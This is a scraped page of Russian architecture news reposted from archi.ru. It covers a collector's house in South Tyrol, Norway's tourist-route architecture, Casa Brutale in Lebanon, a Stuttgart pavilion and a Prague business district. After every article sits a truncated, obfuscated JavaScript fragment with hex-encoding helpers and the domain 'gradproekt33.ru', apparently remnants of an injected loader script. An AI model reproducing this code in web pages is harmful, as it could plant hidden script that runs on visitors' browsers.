Дом и художественная галерея коллекционера Антонио Далле Ногаре в Южном Тироле по проекту Вальтера Ангонезе и Андреа Марастони.
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Частные коллекции тяжело показать на карте, особенно если их владельцы избегают публичности: ведь многие из них предпочитают делиться своими сокровищами лишь с узким кругом друзей. Существуют, конечно, и обратные ситуации, когда коллекционер открывает свои владения для всех желающих в определенные дни недели или по предварительной договоренности, а иногда – и на постоянной основе, как полноценный музей. Такие галереи отличаются разнообразной архитектурой и могут быть старинными палаццо в исторических городах (Палаццо Грасси в Венеции с коллекцией Франсуа Пино), замками в живописной местности или частными домами (Галерея Goetz в Мюнхене).
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Итальянский коллекционер Антонио Далле Ногаре – один из ведущих в Европе – решил построить, как он сам его называет, «личное пространство для искусства» на окраине города Больцано, совмещающее на общей площади в 2 400 м2 жилье и художественную галерею. Для воплощения этой идеи он пригласил известных местных архитекторов: Вальтера Ангонезе и Андреа Марастони. Строительные работы были выполнены собственной строительной компанией господина Далле Ногаре (этот бизнес он унаследовал от отца).
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Рельеф участка имеет очень крутой уклон, зато оттуда открывается панорама города. Ранее там находилось здание 1980-х годов, принадлежавшее семье Далле Ногаре, которое ради нового проекта было частично снесено. По строительным нормам региона, выше поверхности земли мог оставаться лишь имевшийся объем, а новые функции должны были быть помещены под землю. Все дело в том, что в Южном Тироле очень трепетно относятся к пейзажу, и в определенных зонах возведение новых зданий просто невозможно, однако в ходе реставрации или реконструкции существующие объекты могут быть изменены. В случае с галерейными пространствами, подземное расположение было даже к лучшему, так что такое архитектурное решение оказалось логичным. Проект требовал значительных земляных работ, и часть извлеченного материала была впоследствии использована при новом строительстве.
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Реализованный через три года проект назвали «домом коллекционера». Сегодня он служит не только жильем Антонио Далле Ногаре и его семьи, художественной галереей, куда, кстати говоря, можно попасть абсолютно бесплатно, предварительно договорившись по телефону или электронной почте, но и резиденцией для художников (как правило, приглашаются два человека в год). Владелец дома считает, что только наблюдая за рождением произведения, можно действительно проникнуть в его суть. Интересным фактом является то, что художник, которому предлагается жить и работать в доме, совершенно не обязан отчитываться о результатах своей работы и устраивать финальную выставку: все зависит от его желаний.
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Каким же получился дом коллекционера? Первое, что бросается в глаза – это большая изогнутая стена, которая, по замыслу архитекторов, должна была стать визуальным посредником между интерьером и пейзажем Тироля вокруг. Объем здания очень хорошо вписан в среду, и со стороны кажется, что он как бы слеплен из отдельных элементов, подобно некой органической форме, естественным образом разросшейся на склоне.
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
За тем, что происходит внутри художественной галереи, можно наблюдать через два окна в зеленом склоне. Галерейная часть занимает два нижних подземных уровня и включает в себя пять пространств, самое крупное из которых составляет 400 м2. Чистота деталей здесь кажется невероятной: пол из узких досок светлого дерева, естественное освещение, проникающее сверху, необходимое техническое оснащение, контролирующее влажность и температуру. Архитекторы и заказчик проделали большую аналитическую работу, прежде чем приступить к реализации, в частности, они посетили многие мировые музеи – от лондонской Тейт до небольших кунстхалле в Австрии и Швейцарии.
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
В здании также есть библиотека по искусству, которая доступна всем желающим – опять-таки, по предварительной договоренности – и служит промежуточной зоной между находящимися под ней выставочными пространствами и расположенным выше домом семьи Далле Ногаре. Хозяева живут на самом верхнем этаже, а все остальные жилые площади предоставляются художникам как резиденция.
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Антонио Далле Ногаре признается, что создавал свою коллекцию, опираясь на собственное чутье; также он поясняет: «Уже мой отец был коллекционером, и для меня, как и для моего брата Йозефа, это увлечение стало чем-то естественным с самого детства». С такой же удивительной естественностью он делится своей страстью с другими, позволяя им увидеть шедевры от XVIII века до наших дней в «доме коллекционера» (и это жилище само по себе – тоже произведение искусства), который, как считают архитекторы, через полвека покроется «патиной времени» и сольется с южнотирольским пейзажем, став его продолжением.
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Дом коллекционера Антонио Далле Ногаре. Изображение предоставлено студией Вальтера Ангонезе |
|
Источник: archi.ru
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
|
Мортен Лёвсет, главный архитектор программы «Национальные туристические дороги Норвегии», приехал в Москву на открытие выставки speech: norway и рассказал Архи.ру о своей работе.
«Национальные туристические дороги» (National Tourist Routes) – проект Норвежского управления государственных дорог (Norwegian Public Roads Administration) по использованию существующей разветвленной дорожной сети как туристических маршрутов, по которым можно попасть в самые живописные районы Норвегии. Для привлечения туристов дороги снабжаются инфраструктурой по проектам ведущих норвежских и зарубежных архитекторов, в том числе бюро «Снёхетта», Петера Цумтора, Сами Ринталы, Рейульфа Рамстада, Тодда Сондерса.
Фотовыставка speech: norway – «Национальные туристические дороги Норвегии» открылась в московском ЦДХ в рамках экспозиции Арх Москва и Московской биеннале архитектуры и продлится до 19 июня 2016 года. Ее организовал журнал speech: при поддержке Посольства Норвегии в России. Куратором выступила Анна Мартовицкая, а дизайн экспозиции разработали Сергей Чобан и Андрей Перлич.
Тодд Сондерс. Смотровая площадка Стегастейн на маршруте Аурланн. 2006. Фото © Kjetil Rolseth |
|
– Архитектурные проекты норвежской программы «Национальные туристические дороги» хорошо известны: их много публикуют, в том числе благодаря их эффектности. Но именно эта эффектность и вызывает у меня вопрос: обычно при работе с уникальными ландшафтами любые рукотворные объекты стараются сделать как можно более незаметными, чтобы не нарушать природную среду, а вы пошли другим путем. Какая идея за этим стояла?
– Проект «Национальные туристические дороги» начался 20 лет назад, когда мы искали прекрасные ландшафты, чтобы соединить их этими туристическими маршрутами. В результате, мы нашли 18 маршрутов, которые очень различаются: одни идут по фьордам, другие – по горам, третьи позволяют полюбоваться водопадами, и так далее. Главной нашей задачей было сохранить уже существовавшие дороги, не менять их – сохраняя таким образом ландшафт. Новые сооружения, которые мы задумали, начались – из-за «охранных» ограничений – с маленьких смотровых площадок и подобных вещей. Прошло несколько лет, и мы начали возводить более эффектные постройки.
В каком-то смысле ответ на ваш вопрос – это стремление создать контраст. Мы хотели создавать современные объекты, принадлежащие нашему времени – это была важная цель. И получающийся контраст современных построек и ландшафта мне кажется очень интересным. Тысячи лет у гор и фьордов, на склонах холмов строили фермы, вы их встречаете все время и в наши дни, и в каком-то смысле «Национальные туристические дороги Норвегии» делают то же самое: помещают в ландшафт контрастирующие с ним здания. На выставке представлены фото наших сооружений, но на самом деле каждый из маршрутов – это только горы и фьорды, архитектура там составляет совсем малую часть: это смотровая площадка, где можно сделать фотографию или придорожный туалет. Причем некоторые санитарные сооружения – довольно большие, так как каждое лето у нас бывает до 700 000 посетителей. Поэтому нам нужны также и очень крупные парковки, нужны туалеты, магазины сувениров, кафе… Самые большие сооружения расположены на [очень популярной] дороге Троллстиген («Лестница троллей»). Иногда нам приходилось сносить существовавшие на маршрутах старые сооружения, потому что они уже не вписывались в программу, следить, чтобы там продавались качественные сувениры и так далее.
Рейульф Рамстад. Смотровая площадка на маршруте Троллстиген. 2012. Фото © Jarle Wæhler / Statens vegvesen |
|
– Высококачественная архитектура, которую заказывает руководство «Национальных туристических дорог Норвегии», привлекает внимание архитекторов по всему миру. А замечают ли, ценят ли ее тысячи туристов, которые ездят по этим маршрутам каждый год? Или они воспринимают ее как нечто функциональное, им интересны лишь ландшафты? – Мне сложно сказать, так как я не проводил такой опрос, но я знаю, что журналисты много пишут о нас, а когда журналисты пишут, то и туристы к нам приезжают. Я думаю, людям эта архитектура нравится. К примеру, на маршруте по побережью Эрсфьордстранда, это очень красивый фьорд на севере Норвегии, мы построили золотой туалет, и я думаю, что половина населения нашей страны знает об этом месте благодаря этому туалету, и большинство приезжающих туда туристов хотят посмотреть в первую очередь именно на него. Конечно, это не настоящее золото, это алюминиевые панели с латунным покрытием, но он так и называется: «Золотой туалет». В какой-то степени мы подчеркиваем таким образом природное окружение, люди запоминают эти места, или даже хотят посетить то, что раньше казалось довольно скучным. Поэтому мы следим за качеством архитектуры и демонтируем те старые сооружения, которые не соответствуют нашим стандартам. К тому же было бы сложно представлять на выставках, которые мы показываем по всему миру, наши маршруты как только одну природу, поэтому мы рекламируем и природу, и архитектуру.
Tupelo Arkitektur. Туалет на маршруте Эрсфьордстранда. 2015. Фото © Per Ritzler / Statens vegvesen |
|
В том числе это создание нового бренда для нашей страны, потому что – что такое Норвегия? Это фьорды, горы, древние деревянные церкви-ставкирки, это скрипка с восемью струнами, это национальные костюмы – все это довольно «националистическое», а теперь мы пытаемся сделать новый бренд, «Национальные туристические дороги» – это современный норвежский бренд. Безусловно, архитектурная составляющая привлекает особое внимание специалистов. Так, мы строим уже вторую постройку Петера Цумтора для нас – в очень отдаленном месте, так туда приезжали целые автобусы студентов-архитекторов, только чтобы взглянуть на стройплощадку! [первая постройка Цумтора для этого заказчика – мемориал сожжённым ведьмам в Вардё, о котором писал Архи.ру].
Петер Цумтор. Мемориал Стейлнесет в Вардё на маршруте Варангер. 2011. Фото © Bjarne Riesto / www.riesto.no |
|
– Так как мы говорим о природе, о в значительной степени нетронутой человеком природной среде, экологический аспект очень важен. Как вы добиваетесь «устойчивости» в своих проектах?
– Норвежское законодательство в обязательном порядке требует от новых проектов «устойчивости», но для нас это не так важно, так как мы используем дерево и долговечные материалы, наши постройки зимой не отапливаются, поэтому мы не тратим много энергии. При этом мы не строим новые дороги, сохраняем старые, поэтому мы мало влияем на среду.
Jensen & Skodvin. Ландшафтный отель Juvet на маршруте Троллстиген. 2008. Фото © Jan Olav Jensen (joj), Jensen & Skodvin Arkitektkontor as |
|
– К примеру, одно из ваших зданий в будущем надо будет снести по причине ветхости: останется ли от него вредный для природы «след»?
– Наши объекты небольшие, это не составит проблемы. При этом мы постоянно применяем переработанные материалы, к примеру, из старого асфальта мы делаем новый – измельчаем его в порошок, добавляем связующее и вновь используем. Мы стараемся строить немного, предпочитаем дерево и бетон. Конечно, за 100–150 лет дерево сгниет, но это обычно очень простые сооружения, которые легко будет заменить.
Сторсезандетский мост на маршруте «Атлантическая дорога». 1989. Фото © Jarle Wæhler / Statens vegvesen |
|
Источник: archi.ru
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
|
«Брутальную виллу» построят в горах Ливана на 1600-метровой высоте
Дом Casa Brutale © OPA, LOOM Design |
|
Дом в скале под названием Casa Brutale, спроектированный архитекторами студии OPA – Open Platform for Architecture (Греция – Нидерланды) Лаертисом Антониосом Андо Василиу и Пантелисом Кампуропулосом появится в Ливанских горах недалеко от Бейрута. Концепцию врезанной в горный массив виллы с прозрачным бассейном вместо крыши команда презентовала ещё в прошлом году. На тот момент проект был совершенно «бумажным»: у него не было ни клиента, ни бюджета, ни участка.
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Не так давно проектом заинтересовался владелец крупного ливанского агентства недвижимости Demco Properties Алекс Демирджан. Для строительства было выбрано место на высоте 1600 м над уровнем моря – в горах Ливана, недалеко от его собственного оздоровительного центра RedRock Village & Spa. По предварительным подсчётам, реализация проекта обойдётся в $2,5 млн. Начать строительство планируется уже этим летом, а завершить – в 2018 году.
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Как говорят архитекторы бюро OPA, проект Casa Brutale является ответом «с противоположным знаком» на знаменитую Виллу Малапарте на Капри, которая ярким коралловым пятном выделяется на фоне скалы. Детище студии OPA, наоборот, призвано остаться незаметным в горной местности, практически слиться со средой. Для этой цели были выбраны простые строительные материалы: дерево, стекло и бетон.
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Три стены здания выполнены из бетонных плит, а единственный не утопленный в массиве скалы фасад решено сделать из армированного стекла – с этой стороны открывается вид на море. Общая площадь виллы составит 270 м2, в ней смогут разместится до шести человек, также предусмотрен подземный гараж для трёх автомобилей.
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Дом Casa Brutale © OPA, LOOM Design |
|
Источник: archi.ru
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
|
В Штутгартском университете построили экспериментальный павильон, прототипом которого послужил панцирь морского ежа.
Каждый год преподаватели и студенты Штутгартского университета проектируют и строят павильоны, раздвигающие границы привычного понимания архитектуры и строительных технологий, причём ключевая тема их экспериментов – сочетание биомиметики и робототехники. Мы уже публиковали их постройки в прошлом (подробнее о них можно прочесть здесь и здесь). В этот раз фанерный павильон, который возвели профессора и учащиеся, похож на панцирь морского ежа. Проект призван наглядно показать потенциал вычислительного проектирования и моделирования, а также цифрового технологического процесса в архитектуре. Реализация проекта осуществлялась силами мультидисциплинарной команды, состоящей из архитекторов, инженеров, биологов и палеонтологов. Руководили исследовательским процессом Ахим Менгес (Achim Menges) из Института вычислительного проектирования (ICD) и Ян Книпперс (Jan Knippers), глава Института строительной конструкции и конструктивного проектирования (ITKE).
© ICD/ITKE University of Stuttgart |
|
© ICD/ITKE University of Stuttgart |
|
© ICD/ITKE University of Stuttgart |
|
Как и в прошлые годы, большой фронт работ был выполнен роботом: сначала умная машина изготавливала шаблоны из ламинированной фанеры (материалом послужил бук), затем сгибала и формировала из них объёмные сегменты – получилась 151 штука. А после сшивала полые блоки между собой при помощи промышленной швейной машины. В результате получилась сводчатая конструкция площадью в 85 м2 и габаритами 11,5 x 9,5 метров. Весит павильон 780 кг.
© ICD/ITKE University of Stuttgart |
|
© ICD/ITKE University of Stuttgart |
|
© ICD/ITKE University of Stuttgart |
|
© ICD/ITKE University of Stuttgart |
|
«Получившаяся конструкция показывает, как синтез биологических принципов и комплексная работа с материалом, формой и роботизированным производством могут открыть совершенно новые методы деревянного строительства», – объясняет значение своего изобретения команда Штутгартского университета.
© ICD/ITKE University of Stuttgart |
|
© ICD/ITKE University of Stuttgart |
|
© ICD/ITKE University of Stuttgart |
|
© ICD/ITKE University of Stuttgart |
|
© ICD/ITKE University of Stuttgart |
|
© ICD/ITKE University of Stuttgart |
|
© ICD/ITKE University of Stuttgart |
|
© ICD/ITKE University of Stuttgart |
|
Источник: archi.ru
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
|
Бюро Захи Хадид представило проект делового района у пражского вокзала им. Масарика.
Деловой район у вокзала им. Масарика © Zaha Hadid Architects |
|
Архитекторы ZHA выиграли конкурс еще в 2014-м, но лишь сейчас проект показан публике. Речь идет о 90 000 м2 офисов, ретейла и общественных пространств, которые должны появиться на ныне неиспользуемом участке в 2,2 га рядом с вокзалом им. Масарика. Проект удовлетворит потребность растущих сферы обслуживания и IT-индустрии в офисных комплексах класса A.
Деловой район у вокзала им. Масарика © Zaha Hadid Architects |
|
Первая очередь проекта должна быть сдана в 2020, полностью его планируется реализовать в 2022. Бюджет составит 6,5 млрд чешских крон, из них 135 млн уйдет на реконструкцию вокзала. Предполагается, что железнодорожная станция, помимо прочего, станет терминалом для нового экспресса в Международный аэропорт им. Вацлава Гавела.
Деловой район у вокзала им. Масарика © Zaha Hadid Architects |
|
Новый комплекс должен «сшить» округа 1, 3 и 8, уменьшив негативное влияние разделяющей их эстакады улицы Вильсоновой. Новая застройка представляет собой череду зданий и общественных зон вдоль бульвара На Флоренци. У вокзала появится новая площадь – ворота города. Кроме того, будут созданы еще три «плазы», включая одну у автовокзала в 8-м округе. Благодаря проекту будут созданы новые переходы над железнодорожными путями, улучшен доступ на платформы.
Деловой район у вокзала им. Масарика © Zaha Hadid Architects |
|
Несмотря на то, что новый район расположится в километре от Староместской площади, он «отзывается» на структуру старого города с его многочисленными шпилями: со стороны исторического центра Праги вытянутая по горизонтали застройка завершается вертикально ориентированным фасадом.
Источник: archi.ru
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
|
|